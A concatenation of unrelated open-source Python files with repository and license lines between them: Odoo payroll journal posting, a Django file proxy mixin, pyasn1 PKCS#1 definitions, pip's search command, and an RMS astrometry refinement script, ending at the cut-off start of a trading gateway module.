move_pool.button_cancel(cr, uid, move_to_cancel, context=context)
move_pool.unlink(cr, uid, move_ids, context=context)
return super(hr_payslip, self).cancel_sheet(cr, uid, ids, context=context)
def process_sheet(self, cr, uid, ids, context=None):
move_pool = self.pool.get('account.move')
hr_payslip_line_pool = self.pool['hr.payslip.line']
precision = self.pool.get('decimal.precision').precision_get(cr, uid, 'Payroll')
for slip in self.browse(cr, uid, ids, context=context):
line_ids = []
debit_sum = 0.0
credit_sum = 0.0
date = slip.date or slip.date_to
name = _('Payslip of %s') % (slip.employee_id.name)
move = {
'narration': name,
'ref': slip.number,
'journal_id': slip.journal_id.id,
'date': date,
}
for line in slip.details_by_salary_rule_category:
amt = slip.credit_note and -line.total or line.total
if float_is_zero(amt, precision_digits=precision):
continue
debit_account_id = line.salary_rule_id.account_debit.id
credit_account_id = line.salary_rule_id.account_credit.id
if debit_account_id:
debit_line = (0, 0, {
'name': line.name,
'partner_id': hr_payslip_line_pool._get_partner_id(cr, uid, line, credit_account=False, context=context),
'account_id': debit_account_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': amt > 0.0 and amt or 0.0,
'credit': amt < 0.0 and -amt or 0.0,
'analytic_account_id': line.salary_rule_id.analytic_account_id and line.salary_rule_id.analytic_account_id.id or False,
'tax_line_id': line.salary_rule_id.account_tax_id and line.salary_rule_id.account_tax_id.id or False,
})
line_ids.append(debit_line)
debit_sum += debit_line[2]['debit'] - debit_line[2]['credit']
if credit_account_id:
credit_line = (0, 0, {
'name': line.name,
'partner_id': hr_payslip_line_pool._get_partner_id(cr, uid, line, credit_account=True, context=context),
'account_id': credit_account_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': amt < 0.0 and -amt or 0.0,
'credit': amt > 0.0 and amt or 0.0,
'analytic_account_id': line.salary_rule_id.analytic_account_id and line.salary_rule_id.analytic_account_id.id or False,
'tax_line_id': line.salary_rule_id.account_tax_id and line.salary_rule_id.account_tax_id.id or False,
})
line_ids.append(credit_line)
credit_sum += credit_line[2]['credit'] - credit_line[2]['debit']
if float_compare(credit_sum, debit_sum, precision_digits=precision) == -1:
acc_id = slip.journal_id.default_credit_account_id.id
if not acc_id:
raise UserError(_('The Expense Journal "%s" has not properly configured the Credit Account!') % (slip.journal_id.name))
adjust_credit = (0, 0, {
'name': _('Adjustment Entry'),
'partner_id': False,
'account_id': acc_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': 0.0,
'credit': debit_sum - credit_sum,
})
line_ids.append(adjust_credit)
elif float_compare(debit_sum, credit_sum, precision_digits=precision) == -1:
acc_id = slip.journal_id.default_debit_account_id.id
if not acc_id:
raise UserError(_('The Expense Journal "%s" has not properly configured the Debit Account!') % (slip.journal_id.name))
adjust_debit = (0, 0, {
'name': _('Adjustment Entry'),
'partner_id': False,
'account_id': acc_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': credit_sum - debit_sum,
'credit': 0.0,
})
line_ids.append(adjust_debit)
move.update({'line_ids': line_ids})
move_id = move_pool.create(cr, uid, move, context=context)
self.write(cr, uid, [slip.id], {'move_id': move_id, 'date' : date}, context=context)
move_pool.post(cr, uid, [move_id], context=context)
return super(hr_payslip, self).process_sheet(cr, uid, [slip.id], context=context)
class hr_salary_rule(osv.osv):
_inherit = 'hr.salary.rule'
_columns = {
'analytic_account_id':fields.many2one('account.analytic.account', 'Analytic Account', domain=[('account_type', '=', 'normal')]),
'account_tax_id':fields.many2one('account.tax', 'Tax'),
'account_debit': fields.many2one('account.account', 'Debit Account', domain=[('deprecated', '=', False)]),
'account_credit': fields.many2one('account.account', 'Credit Account', domain=[('deprecated', '=', False)]),
}
class hr_contract(osv.osv):
_inherit = 'hr.contract'
_description = 'Employee Contract'
_columns = {
'analytic_account_id':fields.many2one('account.analytic.account', 'Analytic Account', domain=[('account_type', '=', 'normal')]),
'journal_id': fields.many2one('account.journal', 'Salary Journal'),
}
class hr_payslip_run(osv.osv):
_inherit = 'hr.payslip.run'
_description = 'Payslip Run'
_columns = {
'journal_id': fields.many2one('account.journal', 'Salary Journal', states={'draft': [('readonly', False)]}, readonly=True, required=True),
}
def _get_default_journal(self, cr, uid, context=None):
journal_obj = self.pool.get('account.journal')
res = journal_obj.search(cr, uid, [('type', '=', 'general')])
if res:
return res[0]
return False
_defaults = {
'journal_id': _get_default_journal,
}
| gpl-3.0 |
sanjuro/RCJK | vendor/django/core/files/utils.py | 901 | 1230 | class FileProxyMixin(object):
"""
A mixin class used to forward file methods to an underlaying file
object. The internal file object has to be called "file"::
class FileProxy(FileProxyMixin):
def __init__(self, file):
self.file = file
"""
encoding = property(lambda self: self.file.encoding)
fileno = property(lambda self: self.file.fileno)
flush = property(lambda self: self.file.flush)
isatty = property(lambda self: self.file.isatty)
newlines = property(lambda self: self.file.newlines)
read = property(lambda self: self.file.read)
readinto = property(lambda self: self.file.readinto)
readline = property(lambda self: self.file.readline)
readlines = property(lambda self: self.file.readlines)
seek = property(lambda self: self.file.seek)
softspace = property(lambda self: self.file.softspace)
tell = property(lambda self: self.file.tell)
truncate = property(lambda self: self.file.truncate)
write = property(lambda self: self.file.write)
writelines = property(lambda self: self.file.writelines)
xreadlines = property(lambda self: self.file.xreadlines)
def __iter__(self):
return iter(self.file)
| apache-2.0 |
axbaretto/beam | sdks/python/.tox/docs/lib/python2.7/site-packages/pyasn1_modules/rfc2437.py | 127 | 2378 | #
# PKCS#1 syntax
#
# ASN.1 source from:
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2.asn
#
# Sample captures could be obtained with "openssl genrsa" command
#
from pyasn1.type import tag, namedtype, namedval, univ, constraint
from pyasn1_modules.rfc2459 import AlgorithmIdentifier
pkcs_1 = univ.ObjectIdentifier('1.2.840.113549.1.1')
rsaEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.1')
md2WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.2')
md4WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.3')
md5WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.4')
sha1WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.5')
rsaOAEPEncryptionSET = univ.ObjectIdentifier('1.2.840.113549.1.1.6')
id_RSAES_OAEP = univ.ObjectIdentifier('1.2.840.113549.1.1.7')
id_mgf1 = univ.ObjectIdentifier('1.2.840.113549.1.1.8')
id_pSpecified = univ.ObjectIdentifier('1.2.840.113549.1.1.9')
id_sha1 = univ.ObjectIdentifier('1.3.14.3.2.26')
MAX = 16
class Version(univ.Integer): pass
class RSAPrivateKey(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('modulus', univ.Integer()),
namedtype.NamedType('publicExponent', univ.Integer()),
namedtype.NamedType('privateExponent', univ.Integer()),
namedtype.NamedType('prime1', univ.Integer()),
namedtype.NamedType('prime2', univ.Integer()),
namedtype.NamedType('exponent1', univ.Integer()),
namedtype.NamedType('exponent2', univ.Integer()),
namedtype.NamedType('coefficient', univ.Integer())
)
class RSAPublicKey(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('modulus', univ.Integer()),
namedtype.NamedType('publicExponent', univ.Integer())
)
# XXX defaults not set
class RSAES_OAEP_params(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('hashFunc', AlgorithmIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('maskGenFunc', AlgorithmIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.NamedType('pSourceFunc', AlgorithmIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 2)))
)
| apache-2.0 |
rest-of/the-deck | lambda/lib/python2.7/site-packages/pip/commands/search.py | 64 | 4777 | from __future__ import absolute_import
import logging
import sys
import textwrap
from pip.basecommand import Command, SUCCESS
from pip.download import PipXmlrpcTransport
from pip.models import PyPI
from pip.utils import get_terminal_size
from pip.utils.logging import indent_log
from pip.exceptions import CommandError
from pip.status_codes import NO_MATCHES_FOUND
from pip._vendor import pkg_resources
from pip._vendor.six.moves import xmlrpc_client
logger = logging.getLogger(__name__)
class SearchCommand(Command):
"""Search for PyPI packages whose name or summary contains <query>."""
name = 'search'
usage = """
%prog [options] <query>"""
summary = 'Search PyPI for packages.'
def __init__(self, *args, **kw):
super(SearchCommand, self).__init__(*args, **kw)
self.cmd_opts.add_option(
'--index',
dest='index',
metavar='URL',
default=PyPI.pypi_url,
help='Base URL of Python Package Index (default %default)')
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
if not args:
raise CommandError('Missing required argument (search query).')
query = args
pypi_hits = self.search(query, options)
hits = transform_hits(pypi_hits)
terminal_width = None
if sys.stdout.isatty():
terminal_width = get_terminal_size()[0]
print_results(hits, terminal_width=terminal_width)
if pypi_hits:
return SUCCESS
return NO_MATCHES_FOUND
def search(self, query, options):
index_url = options.index
with self._build_session(options) as session:
transport = PipXmlrpcTransport(index_url, session)
pypi = xmlrpc_client.ServerProxy(index_url, transport)
hits = pypi.search({'name': query, 'summary': query}, 'or')
return hits
def transform_hits(hits):
"""
The list from pypi is really a list of versions. We want a list of
packages with the list of versions stored inline. This converts the
list from pypi into one we can use.
"""
packages = {}
for hit in hits:
name = hit['name']
summary = hit['summary']
version = hit['version']
score = hit['_pypi_ordering']
if score is None:
score = 0
if name not in packages.keys():
packages[name] = {
'name': name,
'summary': summary,
'versions': [version],
'score': score,
}
else:
packages[name]['versions'].append(version)
# if this is the highest version, replace summary and score
if version == highest_version(packages[name]['versions']):
packages[name]['summary'] = summary
packages[name]['score'] = score
# each record has a unique name now, so we will convert the dict into a
# list sorted by score
package_list = sorted(
packages.values(),
key=lambda x: x['score'],
reverse=True,
)
return package_list
def print_results(hits, name_column_width=None, terminal_width=None):
if not hits:
return
if name_column_width is None:
name_column_width = max([
len(hit['name']) + len(hit.get('versions', ['-'])[-1])
for hit in hits
]) + 4
installed_packages = [p.project_name for p in pkg_resources.working_set]
for hit in hits:
name = hit['name']
summary = hit['summary'] or ''
version = hit.get('versions', ['-'])[-1]
if terminal_width is not None:
# wrap and indent summary to fit terminal
summary = textwrap.wrap(
summary,
terminal_width - name_column_width - 5,
)
summary = ('\n' + ' ' * (name_column_width + 3)).join(summary)
line = '%-*s - %s' % (name_column_width,
'%s (%s)' % (name, version), summary)
try:
logger.info(line)
if name in installed_packages:
dist = pkg_resources.get_distribution(name)
with indent_log():
latest = highest_version(hit['versions'])
if dist.version == latest:
logger.info('INSTALLED: %s (latest)', dist.version)
else:
logger.info('INSTALLED: %s', dist.version)
logger.info('LATEST: %s', latest)
except UnicodeEncodeError:
pass
def highest_version(versions):
return next(iter(
sorted(versions, key=pkg_resources.parse_version, reverse=True)
))
| mit |
CroatianMeteorNetwork/RMS | RMS/Astrometry/CheckFit.py | 1 | 25717 | """ Automatic refining of astrometry calibration. The initial astrometric calibration is needed, which will be
refined by using all stars from a given night.
"""
from __future__ import print_function, division, absolute_import
import os
import sys
import copy
import shutil
import random
import argparse
import numpy as np
import scipy.optimize
import matplotlib.pyplot as plt
import RMS.ConfigReader as cr
from RMS.Formats import Platepar
from RMS.Formats import CALSTARS
from RMS.Formats import StarCatalog
from RMS.Formats import FFfile
from RMS.Astrometry.ApplyAstrometry import raDecToXYPP, xyToRaDecPP, rotationWrtHorizon, getFOVSelectionRadius
from RMS.Astrometry.Conversions import date2JD, jd2Date, raDec2AltAz
from RMS.Astrometry.FFTalign import alignPlatepar
from RMS.Math import angularSeparation
# Import Cython functions
import pyximport
pyximport.install(setup_args={'include_dirs':[np.get_include()]})
from RMS.Astrometry.CyFunctions import matchStars, subsetCatalog
def computeMinimizationTolerances(config, platepar, star_dict_len):
""" Compute tolerances for minimization. """
# Calculate the function tolerance, so the desired precision can be reached (the number is calculated
# in the same regard as the cost function)
fatol = (config.dist_check_threshold**2)/np.sqrt(star_dict_len*config.min_matched_stars + 1)
# Parameter estimation tolerance for angular values
fov_w = platepar.X_res/platepar.F_scale
xatol_ang = config.dist_check_threshold*fov_w/platepar.X_res
return fatol, xatol_ang
def matchStarsResiduals(config, platepar, catalog_stars, star_dict, match_radius, ret_nmatch=False, \
sky_coords=False, lim_mag=None, verbose=False):
""" Match the image and catalog stars with the given astrometry solution and estimate the residuals
between them.
Arguments:
config: [Config structure]
platepar: [Platepar structure] Astrometry parameters.
catalog_stars: [ndarray] An array of catalog stars (ra, dec, mag).
star_dict: [ndarray] A dictionary where the keys are JDs when the stars were recorded and values are
2D list of stars, each entry is (X, Y, bg_level, level, fwhm).
match_radius: [float] Maximum radius for star matching (pixels).
min_matched_stars: [int] Minimum number of matched stars on the image for the image to be accepted.
Keyword arguments:
ret_nmatch: [bool] If True, the function returns the number of matched stars and the average
deviation. False by default.
sky_coords: [bool] If True, sky coordinate residuals in RA, dec will be used to compute the cost,
function, not image coordinates.
lim_mag: [float] Override the limiting magnitude from config. None by default.
verbose: [bool] Print results. True by default.
Return:
cost: [float] The cost function which weights the number of matched stars and the average deviation.
"""
if lim_mag is None:
lim_mag = config.catalog_mag_limit
# Estimate the FOV radius
fov_radius = getFOVSelectionRadius(platepar)
# Dictionary containing the matched stars, the keys are JDs of every image
matched_stars = {}
# Go through every FF image and its stars
for jd in star_dict:
# Estimate RA,dec of the centre of the FOV
_, RA_c, dec_c, _ = xyToRaDecPP([jd2Date(jd)], [platepar.X_res/2], [platepar.Y_res/2], [1], \
platepar, extinction_correction=False)
RA_c = RA_c[0]
dec_c = dec_c[0]
# Get stars from the catalog around the defined center in a given radius
_, extracted_catalog = subsetCatalog(catalog_stars, RA_c, dec_c, jd, platepar.lat, platepar.lon, \
fov_radius, lim_mag)
ra_catalog, dec_catalog, mag_catalog = extracted_catalog.T
# Extract stars for the given Julian date
stars_list = star_dict[jd]
stars_list = np.array(stars_list)
# Convert all catalog stars to image coordinates
cat_x_array, cat_y_array = raDecToXYPP(ra_catalog, dec_catalog, jd, platepar)
# Take only those stars which are within the FOV
x_indices = np.argwhere((cat_x_array >= 0) & (cat_x_array < platepar.X_res))
y_indices = np.argwhere((cat_y_array >= 0) & (cat_y_array < platepar.Y_res))
cat_good_indices = np.intersect1d(x_indices, y_indices).astype(np.uint32)
# cat_x_array = cat_x_array[good_indices]
# cat_y_array = cat_y_array[good_indices]
# # Plot image stars
# im_y, im_x, _, _ = stars_list.T
# plt.scatter(im_y, im_x, facecolors='none', edgecolor='g')
# # Plot catalog stars
# plt.scatter(cat_y_array[cat_good_indices], cat_x_array[cat_good_indices], c='r', s=20, marker='+')
# plt.show()
# Match image and catalog stars
matched_indices = matchStars(stars_list, cat_x_array, cat_y_array, cat_good_indices, match_radius)
# Skip this image is no stars were matched
if len(matched_indices) < config.min_matched_stars:
continue
matched_indices = np.array(matched_indices)
matched_img_inds, matched_cat_inds, dist_list = matched_indices.T
# Extract data from matched stars
matched_img_stars = stars_list[matched_img_inds.astype(np.int)]
matched_cat_stars = extracted_catalog[matched_cat_inds.astype(np.int)]
# Put the matched stars to a dictionary
matched_stars[jd] = [matched_img_stars, matched_cat_stars, dist_list]
# # Plot matched stars
# im_y, im_x, _, _ = matched_img_stars.T
# cat_y = cat_y_array[matched_cat_inds.astype(np.int)]
# cat_x = cat_x_array[matched_cat_inds.astype(np.int)]
# plt.scatter(im_x, im_y, c='r', s=5)
# plt.scatter(cat_x, cat_y, facecolors='none', edgecolor='g')
# plt.xlim([0, platepar.X_res])
# plt.ylim([platepar.Y_res, 0])
# plt.show()
# If residuals on the image should be computed
if not sky_coords:
unit_label = 'px'
# Extract all distances
global_dist_list = []
# level_list = []
# mag_list = []
for jd in matched_stars:
# matched_img_stars, matched_cat_stars, dist_list = matched_stars[jd]
_, _, dist_list = matched_stars[jd]
global_dist_list += dist_list.tolist()
# # TEST
# level_list += matched_img_stars[:, 3].tolist()
# mag_list += matched_cat_stars[:, 2].tolist()
# # Plot levels vs. magnitudes
# plt.scatter(mag_list, np.log10(level_list))
# plt.xlabel('Magnitude')
# plt.ylabel('Log10 level')
# plt.show()
# Compute the residuals on the sky
else:
unit_label = 'arcmin'
global_dist_list = []
# Go through all matched stars
for jd in matched_stars:
matched_img_stars, matched_cat_stars, dist_list = matched_stars[jd]
# Go through all stars on the image
for img_star_entry, cat_star_entry in zip(matched_img_stars, matched_cat_stars):
# Extract star coords
star_y = img_star_entry[0]
star_x = img_star_entry[1]
cat_ra = cat_star_entry[0]
cat_dec = cat_star_entry[1]
# Convert image coordinates to RA/Dec
_, star_ra, star_dec, _ = xyToRaDecPP([jd2Date(jd)], [star_x], [star_y], [1], \
platepar, extinction_correction=False)
# Compute angular distance between the predicted and the catalog position
ang_dist = np.degrees(angularSeparation(np.radians(cat_ra), np.radians(cat_dec), \
np.radians(star_ra[0]), np.radians(star_dec[0])))
# Store the angular separation in arc minutes
global_dist_list.append(ang_dist*60)
# Number of matched stars
n_matched = len(global_dist_list)
if n_matched == 0:
if verbose:
print('No matched stars with radius {:.1f} px!'.format(match_radius))
if ret_nmatch:
return 0, 9999.0, 9999.0, {}
else:
return 9999.0
# Calculate the average distance
avg_dist = np.median(global_dist_list)
cost = (avg_dist**2)*(1.0/np.sqrt(n_matched + 1))
if verbose:
print()
print("Matched {:d} stars with radius of {:.1f} px".format(n_matched, match_radius))
print(" Average distance = {:.3f} {:s}".format(avg_dist, unit_label))
print(" Cost function = {:.5f}".format(cost))
if ret_nmatch:
return n_matched, avg_dist, cost, matched_stars
else:
return cost
def checkFitGoodness(config, platepar, catalog_stars, star_dict, match_radius, verbose=False):
""" Checks if the platepar is 'good enough', given the extracted star positions. Returns True if the
fit is deemed good, False otherwise. The goodness of fit is determined by 2 criteria: the average
star residual (in pixels) has to be below a certain threshold, and an average number of matched stars
per image has to be above a predefined threshold as well.
Arguments:
config: [Config structure]
platepar: [Platepar structure] Initial astrometry parameters.
catalog_stars: [ndarray] An array of catalog stars (ra, dec, mag).
star_dict: [ndarray] A dictionary where the keys are JDs when the stars were recorded and values are
2D list of stars, each entry is (X, Y, bg_level, level).
match_radius: [float] Maximum radius for star matching (pixels).
Keyword arguments:
verbose: [bool] If True, fit status will be printed on the screen. False by default.
Return:
[bool] True if the platepar is good, False otherwise.
"""
if verbose:
print()
print("CHECK FIT GOODNESS:")
# Match the stars and calculate the residuals
n_matched, avg_dist, cost, matched_stars = matchStarsResiduals(config, platepar, catalog_stars, \
star_dict, match_radius, ret_nmatch=True, verbose=verbose)
# ### Plot zenith distance vs. residual
# # Go through all images
# for jd in matched_stars:
# _, cat_stars, dists = matched_stars[jd]
# # Extract RA/Dec
# ra, dec, _ = cat_stars.T
# zangle_list = []
# for ra_t, dec_t in zip(ra, dec):
# # Compute zenith distance
# azim, elev = raDec2AltAz(ra_t, dec_t, jd, platepar.lat, platepar.lon)
# zangle = 90 - elev
# zangle_list.append(zangle)
# # Plot zangle vs. distance
# plt.scatter(zangle_list, dists, c='k', s=0.1)
# plt.xlabel('Zenith angle')
# plt.ylabel('Residual (px)')
# plt.show()
# ###
# Check that the average distance is within the threshold
if avg_dist <= config.dist_check_threshold:
if verbose:
print()
print('The minimum residual is satisfied!')
# Check that the minimum number of stars is matched per every image
if n_matched >= len(star_dict)*1:
return True
else:
if verbose:
print('But there are not enough stars on every image, recalibrating...')
return False
def _calcImageResidualsAstro(params, config, platepar, catalog_stars, star_dict, match_radius):
""" Calculates the differences between the stars on the image and catalog stars in image coordinates with
the given astrometrical solution.
Arguments:
params: [list] Fit parameters - reference RA, Dec, position angle, and scale.
config: [Config]
platepar: [Platepar]
catalog_stars: [list] List of (ra, dec, mag) entries (angles in degrees).
star_dict: [dict] Dictionary which contains the JD, and a list of (X, Y, bg_intens, intens) of the
stars on the image.
match_radius: [float] Star match radius (px).
Return:
[float] The average pixel residual (difference between image and catalog positions) normalized
by the square root of the total number of matched stars.
"""
# Make a copy of the platepar
pp = copy.deepcopy(platepar)
# Extract fitting parameters
ra_ref, dec_ref, pos_angle_ref, F_scale = params
# Set the fitting parameters to the platepar clone
pp.RA_d = ra_ref
pp.dec_d = dec_ref
pp.pos_angle_ref = pos_angle_ref
pp.F_scale = F_scale
# Match stars and calculate image residuals
return matchStarsResiduals(config, pp, catalog_stars, star_dict, match_radius, verbose=False)
def starListToDict(config, calstars_list, max_ffs=None):
""" Converts the list of calstars into dictionary where the keys are FF file JD and the values is
a list of (X, Y, bg_intens, intens) of stars.
"""
# Convert the list to a dictionary
calstars = {ff_file: star_data for ff_file, star_data in calstars_list}
# Dictionary which will contain the JD, and a list of (X, Y, bg_intens, intens) of the stars
star_dict = {}
# Take only those files with enough stars on them
for ff_name in calstars:
stars_list = calstars[ff_name]
# Check if there are enough stars on the image
if len(stars_list) >= config.ff_min_stars:
# Calculate the JD time of the FF file
dt = FFfile.getMiddleTimeFF(ff_name, config.fps, ret_milliseconds=True)
jd = date2JD(*dt)
# Add the time and the stars to the dict
star_dict[jd] = stars_list
if max_ffs is not None:
# Limit the number of FF files used
if len(star_dict) > max_ffs:
# Randomly choose calstars_files_N image files from the whole list
rand_keys = random.sample(list(star_dict), max_ffs)
star_dict = {key: star_dict[key] for key in rand_keys}
return star_dict
def autoCheckFit(config, platepar, calstars_list, _fft_refinement=False):
""" Attempts to refine the astrometry fit with the given stars and and initial astrometry parameters.
Arguments:
config: [Config structure]
platepar: [Platepar structure] Initial astrometry parameters.
calstars_list: [list] A list containing stars extracted from FF files. See RMS.Formats.CALSTARS for
more details.
Keyword arguments:
_fft_refinement: [bool] Internal flag indicating that autoCF is running the second time recursively
after FFT platepar adjustment.
Return:
(platepar, fit_status):
platepar: [Platepar structure] Estimated/refined platepar.
fit_status: [bool] True if fit was successfuly, False if not.
"""
def _handleFailure(config, platepar, calstars_list, catalog_stars, _fft_refinement):
""" Run FFT alignment before giving up on ACF. """
if not _fft_refinement:
print()
print("-------------------------------------------------------------------------------")
print('The initial platepar is bad, trying to refine it using FFT phase correlation...')
print()
# Prepare data for FFT image registration
calstars_dict = {ff_file: star_data for ff_file, star_data in calstars_list}
# Extract star list from CALSTARS file from FF file with most stars
max_len_ff = max(calstars_dict, key=lambda k: len(calstars_dict[k]))
# Take only X, Y (change order so X is first)
calstars_coords = np.array(calstars_dict[max_len_ff])[:, :2]
calstars_coords[:, [0, 1]] = calstars_coords[:, [1, 0]]
# Get the time of the FF file
calstars_time = FFfile.getMiddleTimeFF(max_len_ff, config.fps, ret_milliseconds=True)
# Try aligning the platepar using FFT image registration
platepar_refined = alignPlatepar(config, platepar, calstars_time, calstars_coords)
print()
### If there are still not enough stars matched, try FFT again ###
min_radius = 10
# Prepare star dictionary to check the match
dt = FFfile.getMiddleTimeFF(max_len_ff, config.fps, ret_milliseconds=True)
jd = date2JD(*dt)
star_dict_temp = {}
star_dict_temp[jd] = calstars_dict[max_len_ff]
# Check the number of matched stars
n_matched, _, _, _ = matchStarsResiduals(config, platepar_refined, catalog_stars, \
star_dict_temp, min_radius, ret_nmatch=True, verbose=True)
# Realign again if necessary
if n_matched < config.min_matched_stars:
print()
print("-------------------------------------------------------------------------------")
print('Doing a second FFT pass as the number of matched stars was too small...')
print()
platepar_refined = alignPlatepar(config, platepar_refined, calstars_time, calstars_coords)
print()
### ###
# Redo autoCF
return autoCheckFit(config, platepar_refined, calstars_list, _fft_refinement=True)
else:
print('Auto Check Fit failed completely, please redo the plate manually!')
return platepar, False
if _fft_refinement:
print('Second ACF run with an updated platepar via FFT phase correlation...')
# Load catalog stars (overwrite the mag band ratios if specific catalog is used)
catalog_stars, _, config.star_catalog_band_ratios = StarCatalog.readStarCatalog(config.star_catalog_path, \
config.star_catalog_file, lim_mag=config.catalog_mag_limit, \
mag_band_ratios=config.star_catalog_band_ratios)
# Dictionary which will contain the JD, and a list of (X, Y, bg_intens, intens) of the stars
star_dict = starListToDict(config, calstars_list, max_ffs=config.calstars_files_N)
# There has to be a minimum of 200 FF files for star fitting
if len(star_dict) < config.calstars_files_N:
print('Not enough FF files in CALSTARS for ACF!')
return platepar, False
# Calculate the total number of calibration stars used
total_calstars = sum([len(star_dict[key]) for key in star_dict])
print('Total calstars:', total_calstars)
if total_calstars < config.calstars_min_stars:
print('Not enough calibration stars, need at least', config.calstars_min_stars)
return platepar, False
print()
# A list of matching radiuses to try
min_radius = 0.5
radius_list = [10, 5, 3, 1.5, min_radius]
# Calculate the function tolerance, so the desired precision can be reached (the number is calculated
# in the same regard as the cost function)
fatol, xatol_ang = computeMinimizationTolerances(config, platepar, len(star_dict))
### If the initial match is good enough, do only quick recalibratoin ###
# Match the stars and calculate the residuals
n_matched, avg_dist, cost, _ = matchStarsResiduals(config, platepar, catalog_stars, star_dict, \
min_radius, ret_nmatch=True)
if n_matched >= config.calstars_files_N:
# Check if the average distance with the tightest radius is close
if avg_dist < config.dist_check_quick_threshold:
print("Using quick fit with smaller radiia...")
# Use a reduced set of initial radius values
radius_list = [1.5, min_radius]
##########
# Match increasingly smaller search radiia around image stars
for i, match_radius in enumerate(radius_list):
# Match the stars and calculate the residuals
n_matched, avg_dist, cost, _ = matchStarsResiduals(config, platepar, catalog_stars, star_dict, \
match_radius, ret_nmatch=True)
print()
print("-------------------------------------------------------------")
print("Refining camera pointing with max pixel deviation = {:.1f} px".format(match_radius))
print("Initial values:")
print(" Matched stars = {:>6d}".format(n_matched))
print(" Average deviation = {:>6.2f} px".format(avg_dist))
# The initial number of matched stars has to be at least the number of FF imaages, otherwise it means
# that the initial platepar is no good
if n_matched < config.calstars_files_N:
print("The total number of initially matched stars is too small! Please manually redo the plate or make sure there are enough calibration stars.")
# Try to refine the platepar with FFT phase correlation and redo the ACF
return _handleFailure(config, platepar, calstars_list, catalog_stars, _fft_refinement)
# Check if the platepar is good enough and do not estimate further parameters
if checkFitGoodness(config, platepar, catalog_stars, star_dict, min_radius, verbose=True):
# Print out notice only if the platepar is good right away
if i == 0:
print("Initial platepar is good enough!")
return platepar, True
# Initial parameters for the astrometric fit
p0 = [platepar.RA_d, platepar.dec_d, platepar.pos_angle_ref, platepar.F_scale]
# Fit the astrometric parameters
res = scipy.optimize.minimize(_calcImageResidualsAstro, p0, args=(config, platepar, catalog_stars, \
star_dict, match_radius), method='Nelder-Mead', \
options={'fatol': fatol, 'xatol': xatol_ang})
print(res)
# If the fit was not successful, stop further fitting
if not res.success:
# Try to refine the platepar with FFT phase correlation and redo the ACF
return _handleFailure(config, platepar, calstars_list, catalog_stars, _fft_refinement)
else:
# If the fit was successful, use the new parameters from now on
ra_ref, dec_ref, pos_angle_ref, F_scale = res.x
platepar.RA_d = ra_ref
platepar.dec_d = dec_ref
platepar.pos_angle_ref = pos_angle_ref
platepar.F_scale = F_scale
# Check if the platepar is good enough and do not estimate further parameters
if checkFitGoodness(config, platepar, catalog_stars, star_dict, min_radius, verbose=True):
return platepar, True
# Match the stars and calculate the residuals
n_matched, avg_dist, cost, matched_stars = matchStarsResiduals(config, platepar, catalog_stars, \
star_dict, min_radius, ret_nmatch=True)
print("FINAL SOLUTION with radius {:.1} px:".format(min_radius))
print(" Matched stars = {:>6d}".format(n_matched))
print(" Average deviation = {:>6.2f} px".format(avg_dist))
# Mark the platepar to indicate that it was automatically refined with CheckFit
platepar.auto_check_fit_refined = True
# Recompute alt/az of the FOV centre
platepar.az_centre, platepar.alt_centre = raDec2AltAz(platepar.RA_d, platepar.dec_d, platepar.JD, \
platepar.lat, platepar.lon)
# Recompute the rotation wrt horizon
platepar.rotation_from_horiz = rotationWrtHorizon(platepar)
return platepar, True
if __name__ == "__main__":
### COMMAND LINE ARGUMENTS
# Init the command line arguments parser
arg_parser = argparse.ArgumentParser(description="Check if the calibration file matches the stars, and improve it.")
arg_parser.add_argument('dir_path', nargs=1, metavar='DIR_PATH', type=str, \
help='Path to the folder with FF or image files. This folder also has to contain the platepar file.')
arg_parser.add_argument('-c', '--config', nargs=1, metavar='CONFIG_PATH', type=str, \
help="Path to a config file which will be used instead of the default one.")
# Parse the command line arguments
cml_args = arg_parser.parse_args()
#########################
dir_path = cml_args.dir_path[0]
# Check if the given directory is OK
if not os.path.exists(dir_path):
print('No such directory:', dir_path)
sys.exit()
# Load the config file
config = cr.loadConfigFromDirectory(cml_args.config, dir_path)
# Get a list of files in the night folder
file_list = os.listdir(dir_path)
# Find and load the platepar file
if config.platepar_name in file_list:
# Load the platepar
platepar = Platepar.Platepar()
platepar.read(os.path.join(dir_path, config.platepar_name), use_flat=config.use_flat)
else:
print('Cannot find the platepar file in the night directory: ', config.platepar_name)
sys.exit()
# Find the CALSTARS file in the given folder
calstars_file = None
for calstars_file in file_list:
if ('CALSTARS' in calstars_file) and ('.txt' in calstars_file):
break
if calstars_file is None:
print('CALSTARS file could not be found in the given directory!')
sys.exit()
# Load the calstars file
calstars_list = CALSTARS.readCALSTARS(dir_path, calstars_file)
print('CALSTARS file: ' + calstars_file + ' loaded!')
# Run the automatic astrometry fit
pp, fit_status = autoCheckFit(config, platepar, calstars_list)
# If the fit suceeded, save the platepar
if fit_status:
print('ACF sucessful!')
# Save the old platepar
shutil.move(os.path.join(dir_path, config.platepar_name), os.path.join(dir_path,
config.platepar_name + '.old'))
# Save the new platepar
pp.write(os.path.join(dir_path, config.platepar_name)) | gpl-3.0 |
kernelmilowill/PDMQBACKTEST | vn.trader/sgitGateway/sgitGateway_4.1/sgitGateway.py | 12 | 35456 | # encoding: UTF-8
'''
vn.sgit的gateway接入
飞鼠接口的委托数据更新是分散在多个推送里的:
1. 下单后,通过onRtnOrder通知是否成功,没有ErrorID说明委托到了交易所
2. 后续的成交状态,通过onRtnTrade通知,用户自行累加
